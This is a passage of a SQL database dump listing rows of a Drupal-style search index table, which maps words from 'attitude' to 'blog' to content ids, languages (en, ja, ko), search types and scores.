('attitude', 194, 'en', 'node_search', 1),
('audio', 35, 'en', 'help_search', 1),
('audio', 35, 'ja', 'help_search', 1),
('audio', 35, 'ko', 'help_search', 1),
('aung', 23, 'en', 'node_search', 1),
('aung', 27, 'en', 'node_search', 6.10352),
('aung', 73, 'en', 'node_search', 1),
('aung', 73, 'ja', 'node_search', 1),
('aung', 76, 'en', 'node_search', 5),
('aung', 76, 'ja', 'node_search', 5),
('aung', 77, 'en', 'node_search', 5),
('aung', 77, 'ja', 'node_search', 5),
('aung', 84, 'en', 'node_search', 28),
('aung', 84, 'ja', 'node_search', 28),
('aung', 86, 'en', 'node_search', 2),
('aung', 86, 'ja', 'node_search', 2),
('aung', 88, 'en', 'node_search', 2),
('aung', 88, 'ja', 'node_search', 2),
('aung', 89, 'en', 'node_search', 2),
('aung', 89, 'ja', 'node_search', 2),
('aung', 91, 'en', 'node_search', 2),
('aung', 91, 'ja', 'node_search', 2),
('aung', 97, 'en', 'node_search', 2),
('aung', 97, 'ja', 'node_search', 2),
('aung', 99, 'en', 'node_search', 2),
('aung', 99, 'ja', 'node_search', 2),
('aung', 103, 'en', 'node_search', 2),
('aung', 103, 'ja', 'node_search', 2),
('aung', 108, 'en', 'node_search', 4),
('aung', 108, 'ja', 'node_search', 4),
('aung', 111, 'en', 'node_search', 2),
('aung', 111, 'ja', 'node_search', 2),
('aung', 113, 'en', 'node_search', 4),
('aung', 113, 'ja', 'node_search', 4),
('aung', 114, 'en', 'node_search', 28),
('aung', 114, 'ja', 'node_search', 31),
('aung', 115, 'en', 'node_search', 28),
('aung', 115, 'ja', 'node_search', 28),
('aung', 117, 'en', 'node_search', 31),
('aung', 117, 'ja', 'node_search', 31),
('aung', 118, 'en', 'node_search', 31),
('aung', 118, 'ja', 'node_search', 31),
('aung', 119, 'en', 'node_search', 31),
('aung', 119, 'ja', 'node_search', 31),
('aung', 121, 'en', 'node_search', 28),
('aung', 121, 'ja', 'node_search', 31),
('aung', 129, 'en', 'node_search', 28),
('aung', 129, 'ja', 'node_search', 28),
('aung', 130, 'en', 'node_search', 1),
('aung', 130, 'ja', 'node_search', 1),
('aung', 134, 'en', 'node_search', 1),
('aung', 134, 'ja', 'node_search', 1),
('aung', 141, 'en', 'node_search', 28),
('aung', 141, 'ja', 'node_search', 31),
('aung', 144, 'en', 'node_search', 62),
('aung', 144, 'ja', 'node_search', 62),
('aung', 153, 'en', 'node_search', 1),
('aung', 153, 'ja', 'node_search', 1),
('aung', 166, 'en', 'node_search', 5),
('aung', 166, 'ja', 'node_search', 4.08679),
('aung', 168, 'en', 'node_search', 2),
('aung', 168, 'ja', 'node_search', 1.75946),
('authentic', 66, 'en', 'node_search', 1),
('authentically', 135, 'en', 'node_search', 1),
('authenticated', 18, 'en', 'help_search', 4),
('authenticated', 18, 'ja', 'help_search', 4),
('authenticated', 18, 'ko', 'help_search', 4),
('authenticated', 37, 'en', 'help_search', 0.968904),
('authenticated', 37, 'ja', 'help_search', 0.968904),
('authenticated', 37, 'ko', 'help_search', 0.968904),
('authenticated', 44, 'en', 'help_search', 1),
('authenticated', 44, 'ja', 'help_search', 1),
('authenticated', 44, 'ko', 'help_search', 1),
('authenticated', 84, 'en', 'help_search', 5),
('authenticated', 84, 'ja', 'help_search', 5),
('authenticated', 84, 'ko', 'help_search', 5),
('authenticating', 44, 'en', 'help_search', 1),
('authenticating', 44, 'ja', 'help_search', 1),
('authenticating', 44, 'ko', 'help_search', 1),
('authentication', 44, 'en', 'help_search', 34),
('authentication', 44, 'ja', 'help_search', 34),
('authentication', 44, 'ko', 'help_search', 34),
('authoring', 23, 'en', 'help_search', 4),
('authoring', 23, 'ja', 'help_search', 4),
('authoring', 23, 'ko', 'help_search', 4),
('authoring', 28, 'en', 'help_search', 3.85992),
('authoring', 28, 'ja', 'help_search', 3.85992),
('authoring', 28, 'ko', 'help_search', 3.85992),
('authorized', 72, 'en', 'help_search', 1),
('authorized', 72, 'ja', 'help_search', 1),
('authorized', 72, 'ko', 'help_search', 1),
('auto', 23, 'en', 'node_search', 1),
('auto', 24, 'en', 'node_search', 1),
('auto', 24, 'ja', 'node_search', 0.662985),
('auto', 24, 'ko', 'node_search', 1),
('auto', 27, 'en', 'node_search', 5.08474),
('automated', 32, 'en', 'help_search', 3.98776),
('automated', 32, 'ja', 'help_search', 3.98776),
('automated', 32, 'ko', 'help_search', 3.98776),
('automatic', 37, 'en', 'help_search', 1),
('automatic', 37, 'ja', 'help_search', 1),
('automatic', 37, 'ko', 'help_search', 1),
('automatic', 41, 'en', 'help_search', 1),
('automatic', 41, 'ja', 'help_search', 1),
('automatic', 41, 'ko', 'help_search', 1),
('automatically', 32, 'en', 'help_search', 1),
('automatically', 32, 'ja', 'help_search', 1),
('automatically', 32, 'ko', 'help_search', 1),
('automatically', 46, 'en', 'help_search', 1.98902),
('automatically', 46, 'ja', 'help_search', 1.98902),
('automatically', 46, 'ko', 'help_search', 1.98902),
('automatically', 56, 'en', 'help_search', 1),
('automatically', 56, 'ja', 'help_search', 1),
('automatically', 56, 'ko', 'help_search', 1),
('automatically', 80, 'en', 'help_search', 0.98493),
('automatically', 80, 'ja', 'help_search', 0.98493),
('automatically', 80, 'ko', 'help_search', 0.98493),
('automaticallygenerated', 5, 'en', 'help_search', 1),
('automaticallygenerated', 5, 'ja', 'help_search', 1),
('automaticallygenerated', 5, 'ko', 'help_search', 1),
('automaticallygenerated', 65, 'en', 'help_search', 1),
('automaticallygenerated', 65, 'ja', 'help_search', 1),
('automaticallygenerated', 65, 'ko', 'help_search', 1),
('available', 1, 'en', 'help_search', 1),
('available', 1, 'ja', 'help_search', 1),
('available', 1, 'ko', 'help_search', 1),
('available', 23, 'en', 'help_search', 4.73881),
('available', 23, 'ja', 'help_search', 4.73881),
('available', 23, 'ko', 'help_search', 4.73881),
('available', 28, 'en', 'help_search', 19),
('available', 28, 'ja', 'help_search', 19),
('available', 28, 'ko', 'help_search', 19),
('available', 31, 'ja', 'help_search', 47.9205),
('available', 32, 'en', 'help_search', 19),
('available', 32, 'ja', 'help_search', 19),
('available', 32, 'ko', 'help_search', 19),
('available', 41, 'en', 'help_search', 1),
('available', 41, 'ja', 'help_search', 1),
('available', 41, 'ko', 'help_search', 1),
('available', 43, 'en', 'help_search', 20),
('available', 43, 'ja', 'help_search', 20),
('available', 43, 'ko', 'help_search', 20),
('available', 47, 'en', 'help_search', 19),
('available', 47, 'ja', 'help_search', 19),
('available', 47, 'ko', 'help_search', 19),
('available', 49, 'en', 'help_search', 1),
('available', 49, 'ja', 'help_search', 1),
('available', 49, 'ko', 'help_search', 1),
('available', 50, 'en', 'help_search', 20),
('available', 50, 'ja', 'help_search', 20),
('available', 50, 'ko', 'help_search', 20),
('available', 53, 'en', 'help_search', 6),
('available', 53, 'ja', 'help_search', 6),
('available', 53, 'ko', 'help_search', 6),
('available', 55, 'en', 'help_search', 2),
('available', 55, 'ja', 'help_search', 2),
('available', 55, 'ko', 'help_search', 2),
('available', 66, 'en', 'help_search', 2),
('available', 66, 'ja', 'help_search', 2),
('available', 76, 'en', 'help_search', 6),
('available', 76, 'ja', 'help_search', 6),
('available', 76, 'ko', 'help_search', 6),
('available', 89, 'en', 'help_search', 1.98493),
('available', 89, 'ja', 'help_search', 1.98087),
('available', 89, 'ko', 'help_search', 1.98493),
('available', 92, 'en', 'help_search', 2),
('available', 92, 'ja', 'help_search', 2),
('available', 92, 'ko', 'help_search', 2),
('available', 93, 'en', 'help_search', 0.827757),
('available', 93, 'ja', 'help_search', 0.827757),
('available', 93, 'ko', 'help_search', 0.827757),
('available', 135, 'en', 'node_search', 1),
('available', 162, 'en', 'node_search', 27),
('avoid', 28, 'en', 'help_search', 0.808176),
('avoid', 28, 'ja', 'help_search', 0.808176),
('avoid', 28, 'ko', 'help_search', 0.808176),
('avoid', 142, 'en', 'node_search', 1),
('await', 66, 'en', 'node_search', 1),
('await', 186, 'en', 'node_search', 1),
('await', 190, 'en', 'node_search', 1),
('awaits', 62, 'en', 'node_search', 1),
('aware', 72, 'en', 'help_search', 0.906287),
('aware', 72, 'ja', 'help_search', 0.906287),
('aware', 72, 'ko', 'help_search', 0.906287),
('away', 70, 'en', 'help_search', 1),
('away', 70, 'ja', 'help_search', 1),
('away', 70, 'ko', 'help_search', 1),
('ayawaddy', 27, 'en', 'node_search', 1),
('aye', 62, 'en', 'node_search', 1),
('aye', 62, 'ja', 'node_search', 1),
('aye', 154, 'en', 'node_search', 1),
('aye', 154, 'ja', 'node_search', 1),
('aye', 156, 'en', 'node_search', 2),
('aye', 156, 'ja', 'node_search', 1.94583),
('aye', 165, 'en', 'node_search', 1),
('aye', 165, 'ja', 'node_search', 1),
('aye', 170, 'en', 'node_search', 10),
('aye', 170, 'ja', 'node_search', 7.96235),
('aye', 176, 'en', 'node_search', 1),
('aye', 176, 'ja', 'node_search', 1),
('aye', 182, 'en', 'node_search', 5),
('aye', 182, 'ja', 'node_search', 5.2547),
('aye', 183, 'en', 'node_search', 5),
('aye', 183, 'ja', 'node_search', 3.99983),
('aye', 193, 'en', 'node_search', 6),
('aye', 193, 'ja', 'node_search', 4.17901),
('bachelor', 10, 'en', 'node_search', 1),
('bachelor', 10, 'ko', 'node_search', 1),
('back', 3, 'en', 'node_search', 1),
('back', 3, 'ko', 'node_search', 1),
('back', 73, 'en', 'help_search', 1),
('back', 73, 'ja', 'help_search', 1),
('back', 73, 'ko', 'help_search', 1),
('background', 5, 'en', 'node_search', 1),
('background', 5, 'ko', 'node_search', 1),
('background', 25, 'en', 'help_search', 1),
('background', 25, 'ja', 'help_search', 1),
('background', 26, 'en', 'help_search', 1),
('background', 26, 'ja', 'help_search', 1),
('background', 26, 'ko', 'help_search', 1),
('backing', 31, 'en', 'node_search', 1),
('bad', 11, 'en', 'help_search', 1),
('bad', 11, 'ja', 'help_search', 1),
('bad', 11, 'ko', 'help_search', 1),
('bago', 24, 'en', 'node_search', 0.722831),
('bago', 24, 'ko', 'node_search', 0.693594),
('ban', 84, 'en', 'help_search', 2),
('ban', 84, 'ja', 'help_search', 2),
('ban', 84, 'ko', 'help_search', 2),
('bank', 3, 'en', 'node_search', 1),
('bank', 3, 'ko', 'node_search', 1),
('bar', 69, 'en', 'help_search', 0.957226),
('bar', 69, 'ja', 'help_search', 0.957226),
('bar', 69, 'ko', 'help_search', 0.957226),
('base', 29, 'en', 'help_search', 21),
('base', 29, 'ja', 'help_search', 21);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('base', 29, 'ko', 'help_search', 21),
('base', 78, 'en', 'help_search', 1),
('base', 78, 'ja', 'help_search', 1),
('base', 78, 'ko', 'help_search', 1),
('base', 90, 'en', 'help_search', 1),
('base', 90, 'ja', 'help_search', 1),
('base', 90, 'ko', 'help_search', 1),
('base', 93, 'en', 'help_search', 6.70772),
('base', 93, 'ja', 'help_search', 6.70772),
('base', 93, 'ko', 'help_search', 6.70772),
('based', 25, 'en', 'node_search', 1),
('based', 27, 'en', 'node_search', 1),
('based', 140, 'en', 'node_search', 1),
('basic', 11, 'en', 'help_search', 1),
('basic', 11, 'ja', 'help_search', 1),
('basic', 11, 'ko', 'help_search', 1),
('basic', 24, 'en', 'node_search', 1.86995),
('basic', 27, 'en', 'node_search', 0.72066),
('basic', 29, 'en', 'help_search', 1),
('basic', 29, 'ja', 'help_search', 1),
('basic', 29, 'ko', 'help_search', 1),
('basic', 31, 'en', 'node_search', 3),
('basic', 44, 'en', 'help_search', 33),
('basic', 44, 'ja', 'help_search', 33),
('basic', 44, 'ko', 'help_search', 33),
('basic', 59, 'en', 'help_search', 11),
('basic', 59, 'ja', 'help_search', 11),
('basic', 59, 'ko', 'help_search', 11),
('basic', 61, 'en', 'help_search', 10.5295),
('basic', 61, 'ja', 'help_search', 10.5295),
('basic', 61, 'ko', 'help_search', 10.5295),
('basic', 66, 'en', 'node_search', 6),
('basic', 71, 'en', 'help_search', 31),
('basic', 71, 'ja', 'help_search', 31),
('basic', 71, 'ko', 'help_search', 31),
('basic', 72, 'en', 'help_search', 4),
('basic', 72, 'ja', 'help_search', 4),
('basic', 72, 'ko', 'help_search', 4),
('basic', 162, 'en', 'node_search', 1),
('basics', 24, 'en', 'node_search', 0.759465),
('basics', 66, 'en', 'node_search', 1),
('batch', 9, 'en', 'node_search', 28),
('batch', 17, 'en', 'node_search', 29),
('batch', 19, 'en', 'node_search', 28),
('batch', 19, 'ko', 'node_search', 28),
('batch', 20, 'en', 'node_search', 28),
('batch', 20, 'ko', 'node_search', 28),
('batch', 31, 'en', 'node_search', 1),
('batch', 95, 'en', 'node_search', 28),
('batch', 95, 'ja', 'node_search', 27),
('batch', 98, 'en', 'node_search', 28),
('batch', 98, 'ja', 'node_search', 27),
('batch', 116, 'en', 'node_search', 46),
('batch', 116, 'ja', 'node_search', 27),
('batch', 122, 'en', 'node_search', 46),
('batch', 122, 'ja', 'node_search', 27),
('batch', 133, 'en', 'node_search', 47),
('batch', 133, 'ja', 'node_search', 27),
('batch', 138, 'en', 'node_search', 46),
('batch', 138, 'ja', 'node_search', 27),
('batch', 140, 'en', 'node_search', 46),
('batch', 140, 'ja', 'node_search', 27),
('bathing', 162, 'en', 'node_search', 1),
('bayint', 4, 'en', 'node_search', 1),
('bayint', 4, 'ja', 'node_search', 1),
('because', 3, 'en', 'node_search', 1),
('because', 3, 'ko', 'node_search', 1),
('because', 35, 'en', 'help_search', 1),
('because', 35, 'ja', 'help_search', 1),
('because', 35, 'ko', 'help_search', 1),
('because', 37, 'en', 'help_search', 1),
('because', 37, 'ja', 'help_search', 1),
('because', 37, 'ko', 'help_search', 1),
('because', 78, 'en', 'help_search', 1),
('because', 78, 'ja', 'help_search', 1),
('because', 78, 'ko', 'help_search', 1),
('become', 23, 'en', 'node_search', 0.980874),
('become', 42, 'en', 'help_search', 1),
('become', 42, 'ja', 'help_search', 1),
('become', 42, 'ko', 'help_search', 1),
('become', 154, 'en', 'node_search', 1),
('becomes', 35, 'en', 'help_search', 1),
('becomes', 35, 'ja', 'help_search', 1),
('becomes', 35, 'ko', 'help_search', 1),
('bed', 87, 'en', 'node_search', 1),
('been', 23, 'en', 'node_search', 2),
('been', 27, 'en', 'node_search', 1.75395),
('been', 30, 'en', 'help_search', 2.61181),
('been', 30, 'ja', 'help_search', 2.61181),
('been', 30, 'ko', 'help_search', 2.61181),
('been', 46, 'en', 'help_search', 1),
('been', 46, 'ja', 'help_search', 1),
('been', 46, 'ko', 'help_search', 1),
('been', 47, 'en', 'help_search', 1),
('been', 47, 'ja', 'help_search', 1),
('been', 47, 'ko', 'help_search', 1),
('been', 48, 'en', 'help_search', 1),
('been', 48, 'ja', 'help_search', 1),
('been', 48, 'ko', 'help_search', 1),
('been', 53, 'en', 'help_search', 1),
('been', 53, 'ja', 'help_search', 1),
('been', 53, 'ko', 'help_search', 1),
('been', 56, 'en', 'help_search', 1),
('been', 56, 'ja', 'help_search', 1),
('been', 56, 'ko', 'help_search', 1),
('been', 67, 'en', 'help_search', 2.7263),
('been', 67, 'ja', 'help_search', 2.7263),
('been', 67, 'ja', 'node_search', 1),
('been', 67, 'ko', 'help_search', 2.7263),
('been', 69, 'en', 'help_search', 1),
('been', 69, 'ja', 'help_search', 1),
('been', 69, 'ko', 'help_search', 1),
('been', 74, 'en', 'help_search', 1),
('been', 74, 'ja', 'help_search', 1),
('been', 74, 'ko', 'help_search', 1),
('been', 77, 'en', 'help_search', 1),
('been', 77, 'ja', 'help_search', 1),
('been', 77, 'ko', 'help_search', 1),
('been', 84, 'en', 'help_search', 1),
('been', 84, 'ja', 'help_search', 1),
('been', 84, 'ko', 'help_search', 1),
('been', 120, 'en', 'node_search', 4),
('before', 7, 'en', 'help_search', 0.96498),
('before', 7, 'ja', 'help_search', 0.96498),
('before', 7, 'ko', 'help_search', 0.96498),
('before', 11, 'en', 'help_search', 1.93838),
('before', 11, 'ja', 'help_search', 1.93838),
('before', 11, 'ko', 'help_search', 1.93838),
('before', 34, 'en', 'help_search', 1),
('before', 34, 'ja', 'help_search', 1),
('before', 34, 'ko', 'help_search', 1),
('before', 37, 'en', 'help_search', 1),
('before', 37, 'ja', 'help_search', 1),
('before', 37, 'ko', 'help_search', 1),
('before', 142, 'en', 'node_search', 1),
('before', 184, 'en', 'node_search', 1),
('begin', 154, 'en', 'node_search', 1),
('begin', 156, 'en', 'node_search', 1),
('begin', 157, 'en', 'node_search', 1),
('begin', 164, 'en', 'node_search', 1),
('begin', 165, 'en', 'node_search', 1),
('begin', 166, 'en', 'node_search', 1),
('begin', 173, 'en', 'node_search', 28),
('begin', 176, 'en', 'node_search', 1),
('begin', 178, 'en', 'node_search', 1),
('begin', 184, 'en', 'node_search', 1),
('beginner', 24, 'en', 'node_search', 0.752312),
('beginner', 24, 'ko', 'node_search', 0.733888),
('beginner', 62, 'en', 'node_search', 1),
('beginner', 66, 'en', 'node_search', 0.989021),
('beginning', 167, 'en', 'node_search', 1),
('beginning', 168, 'en', 'node_search', 1),
('beginning', 174, 'en', 'node_search', 1),
('beginning', 175, 'en', 'node_search', 1),
('beginning', 176, 'en', 'node_search', 1),
('beginning', 177, 'en', 'node_search', 1),
('beginning', 190, 'en', 'node_search', 1),
('beginning', 193, 'en', 'node_search', 27),
('beginning', 196, 'en', 'node_search', 1),
('beginning', 197, 'en', 'node_search', 1),
('begins', 164, 'en', 'node_search', 32),
('begins', 171, 'en', 'node_search', 28),
('begins', 174, 'en', 'node_search', 27),
('begins', 175, 'en', 'node_search', 1),
('begins', 177, 'en', 'node_search', 27),
('begins', 187, 'en', 'node_search', 27),
('begins', 199, 'en', 'node_search', 1),
('begun', 142, 'en', 'node_search', 1),
('behalf', 133, 'en', 'node_search', 1),
('behave', 87, 'en', 'node_search', 1),
('behaves', 30, 'en', 'help_search', 1),
('behaves', 30, 'ja', 'help_search', 1),
('behaves', 30, 'ko', 'help_search', 1),
('behaving', 34, 'en', 'help_search', 1),
('behaving', 34, 'ja', 'help_search', 1),
('behaving', 34, 'ko', 'help_search', 1),
('behavior', 11, 'en', 'help_search', 1),
('behavior', 11, 'ja', 'help_search', 1),
('behavior', 11, 'ko', 'help_search', 1),
('behavior', 68, 'en', 'help_search', 1),
('behavior', 68, 'ja', 'help_search', 1),
('behavior', 68, 'ko', 'help_search', 1),
('behavior', 93, 'en', 'help_search', 3.8289),
('behavior', 93, 'ja', 'help_search', 3.8289),
('behavior', 93, 'ko', 'help_search', 3.8289),
('behind', 122, 'en', 'node_search', 1),
('behind', 191, 'en', 'node_search', 1),
('being', 11, 'en', 'help_search', 1),
('being', 11, 'ja', 'help_search', 1),
('being', 11, 'ko', 'help_search', 1),
('being', 20, 'en', 'help_search', 1),
('being', 20, 'ja', 'help_search', 1),
('being', 20, 'ko', 'help_search', 1),
('being', 28, 'en', 'help_search', 0.819249),
('being', 28, 'ja', 'help_search', 0.819249),
('being', 28, 'ko', 'help_search', 0.819249),
('being', 30, 'en', 'help_search', 0.78951),
('being', 30, 'ja', 'help_search', 0.78951),
('being', 30, 'ko', 'help_search', 0.78951),
('being', 73, 'en', 'help_search', 1),
('being', 73, 'ja', 'help_search', 1),
('being', 73, 'ko', 'help_search', 1),
('being', 78, 'en', 'help_search', 3),
('being', 78, 'ja', 'help_search', 3),
('being', 78, 'ko', 'help_search', 3),
('being', 93, 'en', 'help_search', 1),
('being', 93, 'ja', 'help_search', 1),
('being', 93, 'ko', 'help_search', 1),
('belief', 120, 'en', 'node_search', 4),
('believe', 67, 'en', 'help_search', 0.931053),
('believe', 67, 'ja', 'help_search', 0.931053),
('believe', 67, 'ko', 'help_search', 0.931053),
('belong', 31, 'ja', 'help_search', 0.923838),
('below', 2, 'en', 'help_search', 1),
('below', 2, 'ja', 'help_search', 1),
('below', 2, 'ko', 'help_search', 1),
('below', 11, 'en', 'help_search', 0.857458),
('below', 11, 'ja', 'help_search', 0.857458),
('below', 11, 'ko', 'help_search', 0.857458),
('below', 13, 'en', 'help_search', 1),
('below', 13, 'ja', 'help_search', 1),
('below', 13, 'ko', 'help_search', 1),
('below', 20, 'en', 'help_search', 1),
('below', 20, 'ja', 'help_search', 1),
('below', 20, 'ko', 'help_search', 1),
('below', 24, 'en', 'help_search', 1),
('below', 24, 'en', 'node_search', 1),
('below', 24, 'ja', 'help_search', 1),
('below', 24, 'ko', 'help_search', 1),
('below', 27, 'en', 'help_search', 1),
('below', 27, 'ja', 'help_search', 1),
('below', 27, 'ko', 'help_search', 1),
('below', 29, 'en', 'help_search', 0.949597),
('below', 29, 'ja', 'help_search', 0.949597),
('below', 29, 'ko', 'help_search', 0.949597),
('below', 30, 'en', 'help_search', 0.685676),
('below', 30, 'ja', 'help_search', 0.685676),
('below', 30, 'ko', 'help_search', 0.685676),
('below', 33, 'en', 'help_search', 1),
('below', 33, 'ja', 'help_search', 1),
('below', 33, 'ko', 'help_search', 1),
('below', 34, 'en', 'help_search', 1),
('below', 34, 'ja', 'help_search', 1),
('below', 34, 'ko', 'help_search', 1),
('below', 35, 'en', 'help_search', 0.968904),
('below', 35, 'ja', 'help_search', 0.968904),
('below', 35, 'ko', 'help_search', 0.968904),
('below', 36, 'en', 'help_search', 1),
('below', 36, 'ja', 'help_search', 1),
('below', 36, 'ko', 'help_search', 1),
('below', 38, 'en', 'help_search', 1),
('below', 38, 'ja', 'help_search', 1),
('below', 38, 'ko', 'help_search', 1),
('below', 40, 'en', 'help_search', 1),
('below', 40, 'ja', 'help_search', 1),
('below', 40, 'ko', 'help_search', 1),
('below', 41, 'en', 'help_search', 1),
('below', 41, 'ja', 'help_search', 1),
('below', 41, 'ko', 'help_search', 1),
('below', 43, 'en', 'help_search', 0.863659),
('below', 43, 'ja', 'help_search', 0.863659),
('below', 43, 'ko', 'help_search', 0.863659),
('below', 48, 'en', 'help_search', 1),
('below', 48, 'ja', 'help_search', 1),
('below', 48, 'ko', 'help_search', 1),
('below', 54, 'en', 'help_search', 2),
('below', 54, 'ja', 'help_search', 2),
('below', 54, 'ko', 'help_search', 2),
('below', 62, 'en', 'help_search', 1),
('below', 62, 'ja', 'help_search', 1),
('below', 62, 'ko', 'help_search', 1),
('below', 65, 'en', 'help_search', 1),
('below', 65, 'ja', 'help_search', 1),
('below', 65, 'ko', 'help_search', 1),
('below', 68, 'en', 'help_search', 0.792123),
('below', 68, 'ja', 'help_search', 0.792123),
('below', 68, 'ko', 'help_search', 0.792123),
('below', 80, 'en', 'help_search', 0.902857),
('below', 80, 'ja', 'help_search', 0.902857),
('below', 80, 'ko', 'help_search', 0.902857),
('below', 84, 'en', 'help_search', 1),
('below', 84, 'ja', 'help_search', 1),
('below', 84, 'ko', 'help_search', 1),
('below', 90, 'en', 'help_search', 1),
('below', 90, 'ja', 'help_search', 1),
('below', 90, 'ko', 'help_search', 1),
('below', 92, 'en', 'help_search', 2),
('below', 92, 'ja', 'help_search', 2),
('below', 92, 'ko', 'help_search', 2),
('below', 93, 'en', 'help_search', 0.786915),
('below', 93, 'ja', 'help_search', 0.786915),
('below', 93, 'ko', 'help_search', 0.786915),
('benefits', 155, 'en', 'node_search', 4),
('benefits', 162, 'en', 'node_search', 4),
('besides', 23, 'en', 'help_search', 1),
('besides', 23, 'ja', 'help_search', 1),
('besides', 23, 'ko', 'help_search', 1),
('besides', 27, 'en', 'node_search', 0.661163),
('best', 6, 'en', 'help_search', 1),
('best', 6, 'ja', 'help_search', 1),
('best', 6, 'ko', 'help_search', 1),
('best', 25, 'en', 'node_search', 1),
('best', 42, 'en', 'help_search', 2),
('best', 42, 'ja', 'help_search', 2),
('best', 42, 'ko', 'help_search', 2),
('best', 87, 'en', 'node_search', 1),
('best', 89, 'en', 'help_search', 1),
('best', 89, 'ja', 'help_search', 1),
('best', 89, 'ko', 'help_search', 1),
('best', 161, 'en', 'node_search', 1),
('best', 164, 'en', 'node_search', 1),
('best', 166, 'en', 'node_search', 1),
('best', 173, 'en', 'node_search', 1),
('best', 199, 'en', 'node_search', 1),
('better', 3, 'en', 'node_search', 1),
('better', 3, 'ko', 'node_search', 1),
('better', 111, 'en', 'node_search', 1),
('between', 5, 'en', 'node_search', 1),
('between', 5, 'ko', 'node_search', 1),
('between', 6, 'en', 'help_search', 1),
('between', 6, 'ja', 'help_search', 1),
('between', 6, 'ko', 'help_search', 1),
('between', 14, 'en', 'help_search', 1),
('between', 14, 'ja', 'help_search', 1),
('between', 14, 'ko', 'help_search', 1),
('between', 23, 'en', 'help_search', 1.81472),
('between', 23, 'ja', 'help_search', 1.81472),
('between', 23, 'ko', 'help_search', 1.81472),
('between', 26, 'en', 'node_search', 1),
('between', 27, 'en', 'node_search', 1),
('between', 30, 'en', 'help_search', 3.79218),
('between', 30, 'ja', 'help_search', 3.79218),
('between', 30, 'ko', 'help_search', 3.79218),
('between', 31, 'en', 'node_search', 1.76508),
('between', 31, 'ja', 'help_search', 1.8477),
('between', 43, 'en', 'help_search', 0.949597),
('between', 43, 'ja', 'help_search', 0.949597),
('between', 43, 'ko', 'help_search', 0.949597),
('beverage', 18, 'en', 'node_search', 28),
('beverage', 18, 'ko', 'node_search', 28),
('beware', 87, 'en', 'node_search', 28),
('beware', 87, 'ja', 'node_search', 27.5732),
('beyond', 66, 'en', 'node_search', 1.9534),
('beyond', 122, 'en', 'node_search', 1),
('bid', 156, 'en', 'node_search', 1),
('bid', 157, 'en', 'node_search', 1),
('big', 37, 'en', 'help_search', 0.949597),
('big', 37, 'ja', 'help_search', 0.949597),
('big', 37, 'ko', 'help_search', 0.949597),
('big', 111, 'en', 'node_search', 1),
('bigpipe', 37, 'en', 'help_search', 9.23322),
('bigpipe', 37, 'ja', 'help_search', 9.23322),
('bigpipe', 37, 'ko', 'help_search', 9.23322),
('blank', 72, 'en', 'help_search', 1),
('blank', 72, 'ja', 'help_search', 1),
('blank', 72, 'ko', 'help_search', 1),
('block', 1, 'en', 'help_search', 52),
('block', 1, 'ja', 'help_search', 52),
('block', 1, 'ko', 'help_search', 52),
('block', 2, 'en', 'help_search', 57),
('block', 2, 'ja', 'help_search', 57),
('block', 2, 'ko', 'help_search', 57),
('block', 3, 'en', 'help_search', 53),
('block', 3, 'ja', 'help_search', 53),
('block', 3, 'ko', 'help_search', 53),
('block', 4, 'en', 'help_search', 34),
('block', 4, 'ja', 'help_search', 34),
('block', 4, 'ko', 'help_search', 34),
('block', 5, 'en', 'help_search', 43),
('block', 5, 'ja', 'help_search', 43),
('block', 5, 'ko', 'help_search', 43),
('block', 17, 'en', 'help_search', 1),
('block', 17, 'ja', 'help_search', 1),
('block', 17, 'ko', 'help_search', 1),
('block', 22, 'en', 'help_search', 5),
('block', 22, 'ja', 'help_search', 5),
('block', 22, 'ko', 'help_search', 5),
('block', 31, 'ja', 'help_search', 8.62029),
('block', 36, 'en', 'help_search', 2),
('block', 36, 'ja', 'help_search', 2),
('block', 36, 'ko', 'help_search', 2),
('block', 39, 'en', 'help_search', 2),
('block', 39, 'ja', 'help_search', 2),
('block', 39, 'ko', 'help_search', 2),
('block', 41, 'en', 'help_search', 4),
('block', 41, 'ja', 'help_search', 4),
('block', 41, 'ko', 'help_search', 4),
('block', 43, 'en', 'help_search', 1),
('block', 43, 'ja', 'help_search', 1),
('block', 43, 'ko', 'help_search', 1),
('block', 45, 'en', 'help_search', 9),
('block', 45, 'ja', 'help_search', 9),
('block', 45, 'ko', 'help_search', 9),
('block', 46, 'en', 'help_search', 1.98493),
('block', 46, 'ja', 'help_search', 1.98493),
('block', 46, 'ko', 'help_search', 1.98493),
('block', 50, 'en', 'help_search', 1),
('block', 50, 'ja', 'help_search', 1),
('block', 50, 'ko', 'help_search', 1),
('block', 57, 'en', 'help_search', 2),
('block', 57, 'ja', 'help_search', 2),
('block', 57, 'ko', 'help_search', 2),
('block', 68, 'en', 'help_search', 1.73835),
('block', 68, 'ja', 'help_search', 1.73835),
('block', 68, 'ko', 'help_search', 1.73835),
('block', 88, 'en', 'help_search', 5),
('block', 88, 'ja', 'help_search', 5),
('block', 88, 'ko', 'help_search', 5),
('block', 90, 'en', 'help_search', 1),
('block', 90, 'ja', 'help_search', 1),
('block', 90, 'ko', 'help_search', 1),
('block', 93, 'en', 'help_search', 6),
('block', 93, 'ja', 'help_search', 6),
('block', 93, 'ko', 'help_search', 6),
('blocked', 86, 'en', 'help_search', 1),
('blocked', 86, 'ja', 'help_search', 1),
('blocked', 86, 'ko', 'help_search', 1),
('blocks', 1, 'en', 'help_search', 8),
('blocks', 1, 'ja', 'help_search', 8),
('blocks', 1, 'ko', 'help_search', 8),
('blocks', 2, 'en', 'help_search', 102),
('blocks', 2, 'ja', 'help_search', 102),
('blocks', 2, 'ko', 'help_search', 102),
('blocks', 4, 'en', 'help_search', 1),
('blocks', 4, 'ja', 'help_search', 1),
('blocks', 4, 'ko', 'help_search', 1),
('blocks', 29, 'en', 'help_search', 2),
('blocks', 29, 'ja', 'help_search', 2),
('blocks', 29, 'ko', 'help_search', 2),
('blocks', 41, 'en', 'help_search', 1),
('blocks', 41, 'ja', 'help_search', 1),
('blocks', 41, 'ko', 'help_search', 1),
('blocks', 43, 'en', 'help_search', 0.989021),
('blocks', 43, 'ja', 'help_search', 0.989021),
('blocks', 43, 'ko', 'help_search', 0.989021),
('blocks', 80, 'en', 'help_search', 1),
('blocks', 80, 'ja', 'help_search', 1),
('blocks', 80, 'ko', 'help_search', 1),
('blog', 11, 'en', 'help_search', 2),
('blog', 11, 'ja', 'help_search', 2),
('blog', 11, 'ko', 'help_search', 2),
('blog', 62, 'en', 'help_search', 1),
('blog', 62, 'ja', 'help_search', 1),
('blog', 62, 'ko', 'help_search', 1),
('blog', 80, 'en', 'help_search', 4),
('blog', 80, 'ja', 'help_search', 4),
